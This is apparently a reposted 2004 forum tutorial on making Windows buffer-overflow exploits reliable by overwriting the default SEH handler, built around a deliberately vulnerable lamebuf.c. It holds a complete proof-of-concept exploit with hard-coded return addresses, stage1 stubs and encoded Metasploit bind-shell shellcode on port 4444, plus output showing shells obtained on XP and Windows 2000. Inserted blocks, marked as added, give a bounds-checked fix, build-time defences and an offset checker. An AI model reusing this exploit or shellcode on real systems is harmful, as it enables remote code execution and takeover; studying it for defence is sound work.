Exploiting Default Exception Handler to Increase Exploit Sta

Posted by 韩冰 on 2004-11-19 10:39
The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address, but in this case we will continue overwriting the stack and overwrite the default exception handler as well.

[Buf] <- Shellcode
[Return Address] <- jmp register (for Windows XP sp1)
[Various Stack Data] <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler] <- jmp register (for Win2k sp4)
[Stage1 Shellcode] <- stage1 shellcode for win2k

If the first return address (Windows XP SP1) is wrong, an exception will occur and the default exception handler will be called (Windows 2000 SP4). This allows us to create a stable exploit with two return addresses.

Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac
Vulnerable Code:

//lamebuf.c
#include<stdio.h>
#include<string.h>
#include<windows.h>
int main(int argc,char *argv[]){
    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2){ return -1; }
    strcpy(buf,argv[1]); // unbounded copy: an argv[1] longer than 512 bytes runs past buf into the return address and the SEH record
    return 0x0;
}
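The fix for this bug is to bound the copy. The program below is an added example, not code from the original post: lamebuf.c with strcpy replaced by a length-checked copy that refuses any argument that would not fit, including the 1600-byte input used in the walkthrough. It is written in portable C so it builds without windows.h; copy_arg, lamebuf_safe and probe_length are names chosen here. On the toolchains of that era the complementary build-time defences are the MSVC /GS stack cookie and the /SAFESEH linker option, which registers a module's legitimate handlers so that an overwritten SE Handler pointing into the stack is not dispatched; later Windows versions add SEHOP, which validates the handler chain itself.

```c
/* Added example, not code from the original post: lamebuf.c with the
   unbounded strcpy() replaced by a length-checked copy. Portable C, so it
   builds without windows.h. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512            /* same buffer size as lamebuf.c */

/* Copy src into dst only if it fits, terminator included.
   Returns 0 on success, -1 if the copy would overflow dst. */
int copy_arg(char *dst, size_t dst_size, const char *src) {
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size) {
        return -1;              /* would clobber whatever follows buf */
    }
    memcpy(dst, src, n + 1);    /* n bytes plus the NUL */
    return 0;
}

/* Drop-in replacement for lamebuf.c's main(): an over-long argv[1] is
   reported and refused instead of overwriting the return address and
   the SEH record behind buf. */
int lamebuf_safe(int argc, char *argv[]) {
    char buf[BUF_SIZE];
    if (argc != 2) { return -1; }
    if (copy_arg(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return -2;
    }
    return 0;
}

/* Feed a constructed argument of `len` bytes of 'A' through copy_arg(),
   so the 1600-byte case from the walkthrough can be checked without
   launching anything. Returns copy_arg()'s result. */
int probe_length(size_t len) {
    char buf[BUF_SIZE];
    char src[2048];
    if (len >= sizeof src) { return -1; }
    memset(src, 'A', len);
    src[len] = '\0';
    return copy_arg(buf, sizeof buf, src);
}

int main(int argc, char *argv[]) {
    printf("511 bytes -> %d, 512 bytes -> %d, 1600 bytes -> %d\n",
           probe_length(511), probe_length(512), probe_length(1600));
    return argc == 2 ? lamebuf_safe(argc, argv) : 0;
}
```

Run with no arguments it only prints the three probe results (0, -1, -1); with one argument it behaves like lamebuf.exe but returns -2 instead of crashing when the argument is too long. The 1600-byte input from the next section is rejected before a single byte is written past buf.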
Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:

0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.
Primary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that esp points to user input, so we will use that as our first-stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first-stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first-stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
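As an added check that is not part of the original post: the two stubs above and the short jump placed in the "Pointer To Next SEH" slot use only six x86 instructions (89 E1 mov ecx,esp; 89 C1 mov ecx,eax; FE CD dec ch; 89 CC mov esp,ecx; FF E4 jmp esp; FF E1 jmp ecx), so the arithmetic behind the layout can be checked offline. The program below interprets exactly those opcodes and combines them with the values in the crash dump (esp 0x0012FF88, SEH record at 0x0012FFB0) and the buffer offsets used in the proof of concept later on the page (return address at 1540, SEH record at 1584, shellcode at 24). The opcode decoding and the buffer base address derived from esp are my reading of the page, not something it states; the page does not record eax at handler entry on Windows 2000, so the Win2k stub is run with a constructed value. All function names are chosen here.

```c
/* Added example, not code from the original post: a minimal interpreter for
   the six x86 instructions the stage1 stubs and the SEH-slot short jump use,
   fed with the addresses from the crash dump and the offsets from the
   proof of concept on this page. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Values taken from the page. */
#define ESP_AT_CRASH  0x0012FF88u  /* ESP in the register dump, after ret */
#define SEH_REC_ADDR  0x0012FFB0u  /* "Pointer to next SEH Record" in the dump */
#define RET_OFFSET    1540u        /* exploit.c: buf offset of the return address */
#define SEH_OFFSET    1584u        /* exploit.c: buf offset of the SEH record */
#define SHELLCODE_OFF 24u          /* exploit.c: shellcode starts here, NOPs before it */

static const unsigned char stage1_xp[] =
    "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";
static const unsigned char stage1_2k[] =
    "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";
static const unsigned char seh_slot[] = "\xEB\x06";

/* Landing address of an EB rel8 short jump stored at field_addr; rel8 is
   relative to the byte after the 2-byte instruction. 0 if not a short jmp. */
uint32_t short_jmp_target(uint32_t field_addr, const unsigned char *field) {
    if (field[0] != 0xEB) { return 0; }
    return field_addr + 2u + (uint32_t)(int32_t)(int8_t)field[1];
}

/* Run a stub made only of  89 E1 mov ecx,esp / 89 C1 mov ecx,eax /
   FE CD dec ch / 89 CC mov esp,ecx / FF E4 jmp esp / FF E1 jmp ecx.
   Returns the address the final jmp transfers to, 0 on any other opcode
   or if the stub ends without a jmp. */
uint32_t stage1_target(const unsigned char *code, size_t len,
                       uint32_t eax, uint32_t esp) {
    uint32_t ecx = 0;
    size_t i;
    for (i = 0; i + 1 < len; i += 2) {
        unsigned char op = code[i], modrm = code[i + 1];
        if (op == 0x89 && modrm == 0xE1) { ecx = esp; }
        else if (op == 0x89 && modrm == 0xC1) { ecx = eax; }
        else if (op == 0x89 && modrm == 0xCC) { esp = ecx; }
        else if (op == 0xFE && modrm == 0xCD) {
            /* dec ch touches bits 8..15 only, wrapping within the byte */
            ecx = (ecx & 0xFFFF00FFu) | ((((ecx >> 8) - 1u) & 0xFFu) << 8);
        }
        else if (op == 0xFF && modrm == 0xE4) { return esp; }
        else if (op == 0xFF && modrm == 0xE1) { return ecx; }
        else { return 0; }
    }
    return 0;
}

/* ret popped buf[1540..1543], so the dumped ESP is &buf[1544]. Derived
   from the page's values, not stated on it. */
uint32_t buf_base_from_dump(void) { return ESP_AT_CRASH - (RET_OFFSET + 4u); }

/* Offset of the dumped SEH record from that base; should equal SEH_OFFSET. */
uint32_t seh_offset_from_dump(void) { return SEH_REC_ADDR - buf_base_from_dump(); }

/* Where the XP stub sends execution, as a buf offset. */
uint32_t xp_landing_offset(void) {
    return stage1_target(stage1_xp, sizeof stage1_xp - 1, 0, ESP_AT_CRASH)
           - buf_base_from_dump();
}

/* Where the short jump in the SEH slot lands, as a buf offset. */
uint32_t seh_jump_landing_offset(void) {
    return short_jmp_target(SEH_REC_ADDR, seh_slot) - buf_base_from_dump();
}

/* Win2k stub: ecx = eax - 0x300, then jmp ecx. The page does not record
   eax at handler entry, so callers pass a value of their choosing. */
uint32_t win2k_landing(uint32_t eax) {
    return stage1_target(stage1_2k, sizeof stage1_2k - 1, eax, 0);
}

int main(void) {
    printf("buf base 0x%08X, SEH record at buf+%u (exploit uses %u)\n",
           buf_base_from_dump(), seh_offset_from_dump(), SEH_OFFSET);
    printf("XP stub lands at buf+%u (%s the NOP run before buf+%u)\n",
           xp_landing_offset(),
           xp_landing_offset() < SHELLCODE_OFF ? "inside" : "outside", SHELLCODE_OFF);
    printf("SEH short jump lands at buf+%u\n", seh_jump_landing_offset());
    return 0;
}
```

The three numbers tie the page together: the dumped SEH record sits 1584 bytes into the buffer, which is exactly where the proof of concept writes the jump; the XP stub lowers esp by 6 x 0x100 and lands at buf+8, inside the NOP run that precedes the shellcode at buf+24; and EB 06 is relative to the end of its own two bytes, so it skips the remaining two bytes of the pointer field plus the four-byte handler and lands at buf+1592, where the second stub is copied. When analysing a crash like the one above, the same arithmetic confirms that an overwritten SEH record was reached from the overflowed buffer rather than from some other corruption.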

Proof Of Concept:

// exploit.c
// Tal Zeltzer - [Double Return] //

#include<stdio.h>
#include<string.h>
#include<windows.h>
#include<process.h> // execve() is declared here by the MSVC CRT

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc,char *argv[]){
    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf,0x0,sizeof(buf));
    memset(buf,0x90,1652); // NOP fill; the addresses and stubs below are written over it
    memcpy(&buf[24],shellcode,sizeof(shellcode)-1);

    memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
    memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage1 Shellcode

    *(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
    *(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
    *(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en

    bufExe[1] = buf;
    //Execute the vulnerable application
    execve(bufExe[0],bufExe,NULL);

    return 0x0;
}
Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.